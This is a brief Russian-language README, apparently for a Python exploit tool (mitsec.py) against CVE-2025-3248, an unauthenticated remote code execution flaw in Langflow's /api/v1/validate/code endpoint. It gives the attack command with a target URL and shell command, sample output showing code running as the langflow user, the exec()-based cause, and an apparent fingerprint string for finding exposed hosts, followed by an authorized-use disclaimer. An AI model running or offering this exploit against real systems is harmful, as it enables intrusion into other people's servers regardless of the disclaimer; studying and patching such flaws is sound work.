
CVE-2025-3248 Langflow RCE эксплойт
Эксплойт удаленного выполнения кода (RCE) для приложений Langflow, уязвимых к CVE-2025-3248.
Затронутая конечная точка:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() в пути кода, контролируемом пользователемapp="Langflow"
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование запрещено.